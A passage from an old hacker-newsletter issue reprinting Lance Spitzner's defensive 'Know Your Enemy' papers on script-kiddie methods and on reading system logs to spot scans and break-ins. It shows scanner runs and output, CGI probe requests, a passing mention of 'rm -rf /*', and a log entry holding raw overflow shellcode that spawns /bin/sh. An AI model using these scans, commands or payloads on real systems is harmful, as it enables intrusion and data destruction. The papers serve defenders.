      jewel case box and the cool colour booklet that is included with
      the cd set. - Cruciphux
      
      @HWA
  
302.0 [IND] Paper: Know your enemy #1 by Lance Spitzner  
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      This is an excellent series by Lance Spitzner I've included the
      entire set and supporting logs and docs where available. This
      is highly recommended reading by both hacker camps - Ed
      
      
      The Tools and Methodologies of the Script Kiddie 
      Know Your Enemy 

      Lance Spitzner 
      http://www.enteract.com/~lspitz/papers.html 
      Last Modified: 21 July, 2000 

      My commander used to tell me that to secure yourself against the enemy, 
      you have to first know who your enemy is. This military doctrine readily 
      applies to the world of network security. Just like the military, you have 
      resources that you are trying to protect. To help protect these resources, 
      you need to know who your threat is and how they are going to attack. This 
      article, the first of a series, does just that, it discusses the tools and 
      methodology of one of the most common and universal threats, the Script 
      Kiddie. If you or your organization has any resources connected to the 
      Internet, this threat applies to you. 

      Know Your Enemy: II focuses on how you can detect these threats, identify 
      what tools they are using and what vulnerabilities they are looking for.  
      Know Your Enemy: III focuses on what happens once they gain root.  
      Specifically, how they       cover their tracks and what they do next. 
      Know Your Enemy: Forensics covers how you can analyze such an attack. 
      Finally, Know Your Enemy: Motives, the result of a group project, uncovers 
      the motives and psychology of some members of the black-hat community, in 
      their own words. 

      Who is the Script Kiddie 

      The script kiddie is someone looking for the easy kill. They are not out 
      for specific information or targeting a specific company. Their goal is to 
      gain root the easiest way possible. They do this by focusing on a small 
      number of exploits, and then searching the entire       Internet for that 
      exploit. Sooner or later they find someone vulnerable. 

      Some of them are advance users who develop their own tools and leave 
      behind sophisticated backdoors. Others have no idea what they are doing 
      and only know how to type "go" at the command prompt. Regardless of the 
      their skill level, they all share a common       strategy, randomly search 
      for a specific weakness, then exploit that weakness. 

      The Threat 

      It is this random selection of targets that make the script kiddie such a 
      dangerous threat. Sooner or later your systems and networks will be 
      probed, you cannot hide from them. I know of admins who were amazed to 
      have their systems scanned when they had been up       for only two days, 
      and no one knew about them. There is nothing amazing here. Most likely, 
      their systems were scanned by a script kiddie who happened to be sweeping 
      that network block. 

      If this was limited to several individual scans, statistics would be in 
      your favor. With millions of systems on the Internet, odds are that no one 
      would find you. However, this is not the case. Most of these tools are 
      easy to use and widely distributed, anyone can use       them. A rapidly 
      growing number of people are obtaining these tools at an alarming rate. As 
      the Internet knows no geographic bounds, this threat has quickly spread 
      throughout the world. Suddenly, the law of numbers is turning against us. 
      With so many users on the Internet using these tools, it is no longer a 
      question of if, but when you will be probed. 

      This is an excellent example of why security through obscurity can fail 
      you. You may believe that if no one knows about your systems, you are 
      secure. Others believe that their systems are of no value, so why would 
      anyone probe them? It is these very systems that       the script kiddies 
      are searching for, the unprotected system that is easy to exploit, the 
      easy kill. 

      The Methodology 

      The script kiddie methodology is a simple one. Scan the Internet for a 
      specific weakness, when you find it, exploit it. Most of the tools they 
      use are automated, requiring little interaction. You launch the tool, then 
      come back several days later to get your results.  No       two tools are 
      alike, just as no two exploits are alike. However, most of the tools use 
      the same strategy. First, develop a database of IPs that can be scanned. 
      Then, scan those IPs for a specific vulnerability. 

      For example, lets say a user had a tool that could exploit imap on Linux 
      systems, such as imapd_exploit.c. First, they would develop a database of 
      IP addresses that they could scan (i.e., systems that are up and 
      reachable). Once this database of IP addresses is built,       the user 
      would want to determine which systems were running Linux. Many scanners 
      today can easily determine this by sending bad packets to a system and 
      seeing how they respond, such as Fyodor's nmap. Then, tools would be used 
      to determine what Linux systems were running imap. All that is left now is 
      to exploit those vulnerable systems. 

      You would think that all this scanning would be extremely noisy, 
      attracting a great deal of attention. However, many people are not 
      monitoring there systems, and do not realize they are being scanned. Also, 
      many script kiddies quietly look for a single system they can       
      exploit. Once they have exploited a system, they now use this systems as a 
      launching pad. They can boldly scan the entire Internet without fear of 
      retribution. If their scans are detected, the system admin and not the 
      black-hat will be held liable. 

      Also, these scan results are often archived or shared among other users, 
      then used at a later date.  For example, a user develops a database of 
      what ports are open on reachable Linux systems.  The user built this 
      database to exploit the current imap vulnerability.       However, lets 
      say that a month from now a new Linux exploit is identified on a different 
      port.  Instead of having to build a new database (which is the most time 
      consuming part), the user can quickly review his archived database and 
      compromise the vulnerable systems.  As an alternative, script kiddies 
      share or even buy databases of vulnerable systems from each other.  You 
      can see examples of this in Know Your Enemy: Motives The script kiddie can 
      then exploit your system without even scanning it.  Just because your 
      systems have not been scanned recently does not mean you are secure. 

      The more sophisticated black-hats implement trojans and backdoors once 
      they compromise a system. Backdoors allow easy and unnoticed access to the 
      system whenever the user wants. The trojans make the intruder 
      undetectable. He would not show up in any of the       logs, systems 
      processes, or file structure. He builds a comfortable and safe home where 
      he can blatantly scan the Internet.  For more information on this, check 
      out Know Your Enemy: III. 

      These attacks are not limited to a certain time of the day. Many admins 
      search their log entries for probes that happen late at night, believing 
      this is when black-hats attack. Script kiddies attack at any time. As they 
      are scanning 24hrs a day, you have no idea when the       probe will 
      happen. Also, these attacks are launched throughout the world. Just as the 
      Internet knows no geographical bounds, it knows no time zones. It may be 
      midnight where the black-hat is, but it is 1pm for you. 

      This methodology of scanning for vulnerable systems can be used for a 
      variety of purposes.  Recently, new Denial of Service attacks have been 
      reported, specifically DDoS (Distributed Denial of Service attacks).  
      These attacks are based on a single user controlling       hundreds, if 
      not thousands of compromised systems throughout the world.  These 
      compromised systems are then remotely coordinated to execute Denial of 
      Service attacks against a victim or victims.  Since multiple compromised 
      systems are used, it is extremelly difficult to defend against and 
      identify the source of the attack.  To gain control of so many systems, 
      script kiddie tactics are often employed.  Vulnerable systems are randomly 
      identified and then compromised to be used as DDoS launching pads.  The 
      more systems compromised, the more powerful the DDoS attack.  One example 
      of such an attack is 'stacheldraht',. To learn more about Distributed 
      Denial of Service attacks and how to protect yourself, check out Paul 
      Ferguson's site Denialinfo 

      The Tools 

      The tools used are extremely simple in use. Most are limited to a single 
      purpose with few options. First come the tools used to build an IP 
      database. These tools are truly random, as they indiscriminently scan the 
      Internet. For example, one tool has a single option, A, B,       or C. The 
      letter you select determines the size of the network to be scanned. The 
      tool then randomly selects which IP network to scan. Another tool uses a 
      domain name (z0ne is an excellent example of this). The tools builds an IP 
      database by conducting zone transfers of the domain name and all 
      sub-domains. User's have built databases with over 2 million IPs by 
      scanning the entire .com or .edu domain. Once discovered, the IPs are then 
      scanned by tools to determine vulnerabilities, such as the version of 
      named, operating system, or services running on the system. Once the 
      vulnerable systems have been identified, the black-hat strikes. For a 
      better understanding of how these tools are used, check out Know Your 
      Enemy: Forensics. 

      How to Protect Against This Threat 

      There are steps you can take to protect yourself against this threat. 
      First, the script kiddie is going for the easy kill, they are looking for 
      common exploits. Make sure your systems and networks are not vulnerable to 
      these exploits. Both www.cert.org and       www.ciac.org are excellent 
      sources on what a common exploit is. Also, the listserv bugtraq (archived 
      at securityfocus.com )is one of the best sources of information. Another 
      way to protect yourself is run only the services you need. If you do not 
      need a service, turn it off. If you do need a service, make sure it is the 
      latest version.  For examples on how to do this, check out Armoring 
      Solaris ,  Armoring Linux  or  Armoring NT. 

      As you learned from the tools section, DNS servers are often used to 
      develop a database of systems that can be probed. Limit the systems that 
      can conduct zone transfers from your Name Servers. Log any unauthorized 
      zone transfers and follow up on them. I highly       recommend upgrading 
      to the latest version of BIND (software used for Domain Name Service), 
      which you can find at www.isc.org/bind.html. Last, watch for your systems 
      being probed. Once identified, you can track these probes and gain a 
      better understanding of the threats to your network and react to these 
      threats. 

      Conclusion 

      The script kiddie poses a threat to all systems. They show no bias and 
      scan all systems, regardless of location and value. Sooner or later, your 
      system will be probed. By understanding their motives and methods, you can 
      better protect your systems against this threat. 
      @HWA

303.0 [IND] Paper: Know your enemy #2 by Lance Spitzner
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Tracking their moves 
      Know Your Enemy: II 

      Lance Spitzner http://www.enteract.com/~lspitz/papers.html Last Modified: 
      July 7, 2000 

      This article is the second of a three part series. In the first article, 
      Know Your Enemy, we covered the tools and methodologies of the Script 
      Kiddie.   Specifically, how they probe for vulnerabilities and then 
      attack.  The third paper covers       what script kiddies do once they 
      gain root.  Specifically, how they cover their tracks and what they do 
      next. This, the second paper,  will cover how to track their movements.   
      Just as in the military, you want to track the bad guys and know what they 
      are doing.  We will cover what you can, and cannot determine, with your 
      system logs.  You may be able to determine if you are being probed,  what 
      you were being probed for,  what tools were used, and if they successful.  
      The examples provided here focus on Linux, but can apply to almost any 
      flavor of Unix.  Keep in mind, there is no guaranteed way to track the 
      enemy's every step.  However, this article is a good place to start. 

      Securing Your Logs       This article is not on Intrusion Detection, there 
      are a variety of excellent sources that cover IDS.  If you are interested 
      in intrusion detection, I recommend checking out applicatons such as 
      Network Flight Recorder  or snort.  This article focuses on intelligence 
      gathering.  Specifically, how to figure out what the enemy is doing by 
      reviewing your system logs.  You will be surprised how much information 
      you will find in your own log files.  However, before we can talk about 
      reviewing your logs, we first have to discuss securing your system logs.  
      Your log files are worthless if you cannot trust the integrity of them.  
      The first thing most black-hats do is alter log files on a compromised 
      system.  There are a variety of rootkits that will wipe out their presence 
      from log files (such as cloak), or alter logging all together (such as 
      trojaned syslogd binaries).  So, the first step to reviewing your logs is 
      securing your logs. 

      This means you will need to use a remote log server.  Regardless of how 
      secure your system is, you cannot trust your logs on a compromised system.  
      If nothing else, the black-hat can simply do a rm -rf /* on your system, 
      wiping your hard drive clean.  This       makes recovering your logs 
      somewhat difficult.  To protect against this, you will want all your 
      systems to log traffic both locally and to a remote log server.  I 
      recommend making your log server a dedicated system, ie. the only thing it 
      should be doing is collecting logs from other systems..  If money is an 
      issue, you can easily build a linux box to act as your log server.  This 
      server should be highly secured, with all services shut off, allowing only 
      console access (see Armoring Linux for an example).   Also, ensure that 
      port 514 UDP is blocked or firewalled at your Internet connection.  This 
      protects your log server from receiving bad or un-authorized logging 
      information from the Internet. 

      For those of you who like to get sneaky, something I like to do is 
      recompile syslogd to read a different configuration file, such as 
      /var/tmp/.conf.  This way the black-hat does not realize where the real 
      configuration file is. This is simply done by changing the entry       
      "/etc/syslog.conf" in the source code to whatever file you want.  We then 
      setup our new configuration file to log both locally and to the remote log 
      server (see example).  Make sure you maintain a standard copy of the 
      configuration file, /etc/syslog.conf, which points to all local logging.  
      Even though this configuration file is now useless, this will throw off 
      the black-hat from realizing the true destination of our remote logging.  
      Another option for your systems is to use a secure method of logging.  One 
      option is to replace your syslogd binary with something that has integrity 
      checking and a greater breadth of options.  One option is syslog-ng, which 
      you can find at  http://www.balabit.hu/products/syslog-ng.html 

      
      Most of the logs we will use are the ones stored on the remote log server.  
      As mentioned earlier, we can be fairly confident of the integrity of these 
      logs since they are on a remote and secured system.  Also, since all 
      systems are logging to a single source, it is much easier to identify 
      patterns in these logs.  We can quickly review what's happening to all the 
      systems in one source.  The only time you would want to review logs stored 
      locally on a system is to compare them to what the log server has.   You 
      can determine if the local logs have been altered by comparing them to the 
      remote logs. 

      Pattern Matching       By looking at your log entries, you can usually 
      determine if you are being port scanned.  Most Script Kiddies scan a 
      network for a single vulnerability.  If your logs show most of your 
      systems being connected from the same remote system, on the same port, 
      this is most likely an exploit scan.  Basically, the enemy has an exploit 
      for a single vulnerability, and they are scanning your network for it.  
      When they find it, they exploit it.  For most Linux systems, TCP Wrappers 
      is installed by default.  So, we would find most of these connections in 
      /var/log/secure.  For other flavors of Unix, we can log all inetd 
      connections by launching inetd with the "-t" flag, facility daemon. A 
      typical exploit scan would look like something below.  Here we have a 
      source scanning for the wu-ftpd vulnerability. 

      /var/log/secure 
      Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200 
      Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200 
      Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200 
      Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200 
      Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200 

      Here we see the source 192.168.11.200 scanning our network.  Notice how 
      the source sequentially scans each IP (this is not always the case).  This 
      is the advantage of having a log server, you can more easily identify 
      patterns in your network since all the logs are combined.  The repeated 
      connections to port 21, ftp, indicated they were most likely looking for 
      the wu-ftpd exploit.  We have just determined what the black-hat is 
      looking for.  Often, scans tend to come in phases.  Someone will release 
      code for an imap exploit, you will suddenly see a rush of imaps scans in 
      your logs.  The next month  you will be hit by ftp.  An excellent source 
      for current exploits is http://www.cert.org/advisories/  Sometimes,  tools 
      will scan for a variety of exploits at the same time, so you may see a 
      single source connecting to several ports. 

      Keep in mind, if you are not logging the service, you will not know if you 
      are scanned for it.  For example, most rpc connections are not logged.  
      However, many services can simply be added to /etc/inetd.conf for logging 
      with TCP Wrappers.  For example, you can       add an entry in 
      /etc/inetd.conf for NetBus. You can define TCP Wrappers to safely deny and 
      log the connections (see Intrusion Detection for more info on this). 

      What's the Tool?       Sometimes you can actually determine the tools 
      being used to scan your network.  Some of the more basic tools scan for a 
      specific exploit, such as ftp-scan.c. If only a single port or 
      vulnerability is being probed on your network, they are most likely using 
      one of these "single mission" tools.  However, there exist  tools that 
      probe for a variety of vulnerabilities or weaknesses, the two very popular 
      tools are sscan by jsbach and nmap by Fyodor.  I've selected these two 
      tools because they represent the two "categories" of scanning tools.  I 
      highly recommend you run these tools against your own network, you may be 
      surprised by  the results :) NOTE:. The tool sscan is now over a year old 
      and severely out of date. sscan is discussed only as an example. For 
      scanning your own network for vulnerabilities, I highly recommend the tool 
      Nessus. 

     sscan represents the "all purpose" Script Kiddie scanning tool. It probes a 
     network for a set of specific vulnerabilities. It is customizable, allowing 
     you to add probes for new exploits.  You just give the tool a network and 
     network mask, and it does the rest for you.  However, the user must be root 
     to use it.  The output is extremely easy to interpret (hence making it so 
     popular):  It gives a concise summary of many vulnerable services.  All you 
     have to do is run sscan against a network, grep for the word "VULN" in the 
     output, and then run the "exploit du jour".  Below is an example of sscan 
     ran against the system mozart (172.17.6.30). 

          otto #./sscan -o 172.17.6.30 

          --------------------------<[ * report for host mozart * 
          <[ tcp port: 80 (http) ]>       <[ tcp port: 23 (telnet) ]> 
          <[ tcp port: 143 (imap) ]>      <[ tcp port: 110 (pop-3) ]> 
          <[ tcp port: 111 (sunrpc) ]>    <[ tcp port: 79 (finger) ]> 
          <[ tcp port: 53 (domain) ]>     <[ tcp port: 25 (smtp) ]> 
          <[ tcp port: 21 (ftp) ]> 
          --<[ *OS*: mozart: os detected: redhat linux 5.1 
          mozart: VULN: linux box vulnerable to named overflow. 
          -<[ *CGI*: 172.17.6.30: tried to redirect a /cgi-bin/phf request. 
          -<[ *FINGER*: mozart: root: account exists. 
          --<[ *VULN*: mozart: sendmail will 'expn' accounts for us 
          --<[ *VULN*: mozart: linux bind/iquery remote buffer overflow 
          --<[ *VULN*: mozart: linux mountd remote buffer overflow 
          ---------------------------<[ * scan of mozart completed *

     Nmap represents the "raw data" tool set.  It doesn't tell you what 
     vulnerabilities exist,  rather, it tells you what ports are open, you 
     determine the security impact.  Nmap has quickly become the port scanner of 
     choice, and with good reason.  It takes the best of a variety of port 
     scanners and puts all their functionality into a single tool, including OS 
     detection, various packet assembly options, both UDP and TCP scanning, 
     randomization, etc.  However, you need  networking skills to use the tool 
     and interpret the data. Below is an example of nmap ran against the same 
     system. 

          otto #nmap -sS -O 172.17.6.30 

          Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) 
          Interesting ports on mozart (172.17.6.30): 
          Port    State       Protocol  Service 
          21      open        tcp        ftp 
          23      open        tcp        telnet 
          25      open        tcp        smtp 
          37      open        tcp        time 
          53      open        tcp        domain 
          70      open        tcp        gopher 
          79      open        tcp        finger 
          80      open        tcp        http 
          109     open        tcp        pop-2 
          110     open        tcp        pop-3 
          111     open        tcp        sunrpc 
          143     open        tcp        imap2 
          513     open        tcp        login 
          514     open        tcp        shell 
          635     open        tcp        unknown 
          2049    open        tcp        nfs 

      TCP Sequence Prediction: Class=truly random 
                               Difficulty=9999999 (Good luck!) 
      Remote operating system guess: Linux 2.0.35-36 

      Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds

      By reviewing your logs, you can determine which of these tools were used
      against you.  To do this, you have to understand how the tools work.  
      First, an sscan will log in  as follows (this is a default scan with no
      modifications to any config files): 

      /var/log/secure 
      Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200 
      Apr 14 19:18:56 mozart imapd[11635]: connect from 192.168.11.200 
      Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 192.168.11.200 
      Apr 14 19:18:56 mozart ipop3d[11638]: connect from 192.168.11.200 
      Apr 14 19:18:56 mozart in.telnetd[11639]: connect from 192.168.11.200 
      Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200 
      Apr 14 19:19:03 mozart ipop3d[11642]: connect from 192.168.11.200 
      Apr 14 19:19:03 mozart imapd[11643]: connect from 192.168.11.200 
      Apr 14 19:19:04 mozart in.fingerd[11646]: connect from 192.168.11.200 
      Apr 14 19:19:05 mozart in.fingerd[11648]: connect from 192.168.11.200 
      
      /var/log/maillog 
      Apr 14 21:01:58 mozart imapd[11667]: command stream end of file, while
                                 reading line user=??? host=[192.168.11.200] 
      Apr 14 21:01:58 mozart ipop3d[11668]: No such file or directory while 
                                 reading line user=??? host=[192.168.11.200] 
      Apr 14 21:02:05 mozart sendmail[11675]: NOQUEUE: [192.168.11.200]: expn root 
      
      /var/log/messages 
      Apr 14 21:03:09 mozart telnetd[11682]: ttloop:  peer died: Invalid or 
                                     incomplete multibyte or wide character 
      Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed 
      
      sscan also scans for cgi-bin vulnerabilities.  These probes will not be
      logged by syslogd, you will find them in access_log.  I decided to included
      them anyway for your edification :) 
      
      /var/log/httpd/access_log 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/phf HTTP/1.0" 302 192 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 170 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/test-cgi HTTP/1.0" 404 169 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/php.cgi HTTP/1.0" 404 168 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/handler HTTP/1.0" 404 168 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webgais HTTP/1.0" 404 168 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/websendmail HTTP/1.0" 404 172 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webdist.cgi HTTP/1.0" 404 172 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/faxsurvey HTTP/1.0" 404 170 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/htmlscript HTTP/1.0" 404 171 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/pfdisplay.cgi HTTP/1.0" 404 174 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/perl.exe HTTP/1.0" 404 169 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/wwwboard.pl HTTP/1.0" 404 172 
      192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/ews/ews/architext_query.pl HTTP/1.0" 404 187 
      192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/jj HTTP/1.0" 404 163 
      
      Notice how a complete connection was made for all the ports(SYN, SYN-ACK, 
      ACK)  then torn down.  That is because sscan is determining at the 
      application layer what is going on.  Not only does sscan want to know if 
      your ftp port is open, but what ftp daemon is running.  The same can be 
      said for imap, pop, etc.  This can be seen in sniff traces using sniffit, 
      a tool commonly used to sniff passwords. 

      mozart $ cat 172.17.6.30.21-192.168.11.200.7238       220 
      mozart.example.net FTP server (Version wu-2.4.2-academ[BETA-17](1) Tue Jun 
      9 10:43:14 EDT 1998) ready. 

      As you see above, a complete connection was made to determine the version 
      of wu-ftpd that was running.  When you see the complete connections in 
      your logs, as shown above, you are most likely  being scanned by an 
      exploit tool.  These tools are making a       complete connection to 
      determine what you are running. 

      Nmap, like most port scanners, does not care what you are running, but if 
      you are running specific services.  For this, nmap has a powerful set of 
      options, letting you determine what kind of connection to make, including 
      SYN, FIN, Xmas, Null, etc.  For a detailed       description of these 
      options, check out http://www.insecure.org/nmap/nmap_doc.html.   Because 
      of these options, your logs will be different based on the options 
      selected by the remote user.   A connection made with the -sT flag is a 
      complete connection, so the logs will like similar to sscan, however by 
      default nmap scans more ports. 
      
      /var/log/secure 
      Apr 14 21:20:50 mozart in.rlogind[11706]: connect from 192.168.11.200 
      Apr 14 21:20:51 mozart in.fingerd[11708]: connect from 192.168.11.200 
      Apr 14 21:20:51 mozart ipop2d[11709]: connect from 192.168.11.200 
      Apr 14 21:20:51 mozart in.rshd[11710]: connect from 192.168.11.200 
      Apr 14 21:20:51 mozart gn[11711]: connect from 192.168.11.200 
      Apr 14 21:20:51 mozart gn[11711]: error: cannot execute /usr/sbin/gn: No such file or directory 
      Apr 14 21:20:52 mozart in.timed[11712]: connect from 192.168.11.200 
      Apr 14 21:20:52 mozart imapd[11713]: connect from 192.168.11.200 
      Apr 14 21:20:52 mozart ipop3d[11714]: connect from 192.168.11.200 
      Apr 14 21:20:52 mozart in.telnetd[11715]: connect from 192.168.11.200 
      Apr 14 21:20:52 mozart in.ftpd[11716]: connect from 192.168.11.200 
      
      One thing to keep in mind is the -D (or decoy) option.  This nmap option 
      allows the user to spoof the source address.  You may see scans from 15 
      different sources at the same time, but only one of them is the real one.  
      It is extremely difficult to determine which of the 15 was the actual 
      source.  More often, users will select the -sS flag for port scanning.  
      This is a stealthier option, as only a SYN packet is sent.   If the remote 
      system responds, the connection is immediately torn down with a RST.  The 
      logs from such a scan looks as follows (NOTE: Only the first five entries 
      are included here). 
      
      /var/log/secure 
      Apr 14 21:25:08 mozart in.rshd[11717]: warning: can't get client address: Connection reset by peer 
      Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown 
      Apr 14 21:25:09 mozart in.timed[11718]: warning: can't get client address: Connection reset by peer 
      Apr 14 21:25:09 mozart in.timed[11718]: connect from unknown 
      Apr 14 21:25:09 mozart imapd[11719]: warning: can't get client address: Connection reset by peer 
      Apr 14 21:25:09 mozart imapd[11719]: connect from unknown 
      Apr 14 21:25:09 mozart ipop3d[11720]: warning: can't get client address: Connection reset by peer 
      Apr 14 21:25:09 mozart ipop3d[11720]: connect from unknown 
      Apr 14 21:25:09 mozart in.rlogind[11722]: warning: can't get client address: Connection reset by peer 
      Apr 14 21:25:09 mozart in.rlogind[11722]: connect from unknown 
        
      
      Notice all the errors in the connections.  Since the SYN-ACK sequence is 
      torn down before a complete connection can be made, the daemon cannot 
      determine the source system.  The logs show that you have been scanned, 
      unfortunately you do not know by whom. What is even more alarming is, on 
      most other systems (including newer kernels of Linux), none of these 
      errors would have been logged.  To qoute Fyodor " ... based on all the 
      'connection reset by peer' messages.  This is a Linux 2.0.XX oddity -- 
      virtually every other system (including the 2.2 and later 2.1 kernels) 
      will show nothing.  That bug (accept() returning before completion of the 
      3-way handshake) was fixed." 

      Nmap includes other stealth option, such as -sF, -sX, -sN where various 
      flags are used,  This is what the logs look like for these scans 
      
      /var/log/secure 
        
      
      Notice something here, no logs!  Scary huh, you just got scanned and 
      didn't even know it.  All three types of scans determined the same 
      results, however you are able to fully log only the first type, -sT (full 
      connection).  To detect these stealth scans, you will need to use a 
      different logging application such as tcplogd or ippl   Some commercial 
      Firewalls will also detect and log all of these scans (I have confirmed 
      this on Checkpoint Firewall 1). 

      
      Did They Gain Access? Once you have determined that you were scanned, and 
      what you were looking for, the next big question is "Did they get in?".   
      Most of today's remote exploits are based on buffer overflows (otherwise 
      known as smashing the stack).  Simply stated, a buffer overflow is when a 
      program (usually a daemon) receives more input then it expected, thus 
      overwriting critical  areas in memory.  Certain code is then executed, 
      usually giving the user root access.  For more info on buffer overflows, 
      check Aleph1's excellent paper at 
      ftp://ftp.technotronic.com/rfc/phrack49-14.txt. 

      You can normally identify buffer overflow attacks in the /var/log/messages 
      log file (or /var/adm/messages for other flavors of Unix) for attacks such 
      as mountd.  You will also see similar logs in maillog for such attacks 
      against imapd.  A buffer overflow attack would       look like this. 
      
      Apr 14 04:20:51 mozart mountd[6688]: Unauthorized access by NFS client 
      					   192.168.11.200. 
      Apr 14 04:20:51 mozart syslogd: Cannot glue message parts together 
      Apr 14 04:20:51 mozart mountd[6688]: Blocked attempt of 192.168.11.200 to mount 
      ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P33^[~@33~Kڰ^F~@u1^B~@~Eubb^V<t^Ft^K0~HF^^B~ 
      I^F~IF^D^F~IF^Hf1~I~@~I^F^Bf~IF^L*f~IF^N~MF^L~IF^D1~IF^P^P~IF^H 
      f~@^A~IF^Df^D~@^DLR1~IF^D~IF^Hf~@~Hð?1~@?~@?~@.bin@~ 
      I^F.sh!@~IF^D1~HF^G~Iv^H~IF^L^K~I~MN^H~MV^L~@1^A1~@EPrivet 
      ADMcrew~P(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(Apr 14 04:20:51 
      mozart ^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^ 
      E^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E 
      ^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^ H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E 
      ^H(-^E^H(-^E 
        
      
      When you see something like this in your log files, someone has attempted 
      to exploit your system.  It is difficult to determine if the exploit was 
      successful.  One way to do this is, following the exploit attempt, see if 
      there are any connections from the remote source to your system.  If they 
      successfully login from the remote system, they have access.  Another clue 
      is if you find the accounts "moof", "rewt", "crak0", or "w0rm" added to 
      your /etc/passwd file.  These accounts, uid 0, are added by some of the 
      more common exploit scripts.  Once a black-hat gains access, normally the 
      first thing they do is wipe your logs clean and trojan your logging 
      (syslogd), for more information, see Know Your Enemy: III.  From this 
      point on, you will not receive any logs from your system as everything has 
      been compromised.  What you do next is subject for another article :).   
      Until then, I recommend you check out 
      http://www.cert.org/nav/recovering.html 

      To help me find anomalies in my log files, I whipped up a shell script 
      that scans my logs for me    For more detailed information on grepping and 
      sorting log files, check out this posting by Marcus Ranum.                                                                                           
      Bourne shell script          Korn shell script Conclusion Your system logs 
      can tell you a great deal about the enemy.  However, the first step is 
      guaranteeing the integrity of your log files.  One of the best ways to do 
      that is use a remote log server that receives and stores logs from all 
      systems.  Once secured, you can then identify patterns in your log files.  
      Based on these patterns and log entries, you can determine what the 
      black-hat is looking for, and potentially what tools they are using.  
      Based on this knowledge, you can better secure and protect your systems. 

      
      @HWA

304.0 [IND] Paper: Know your enemy #3: Forensic Analysis by Lance Spitzner
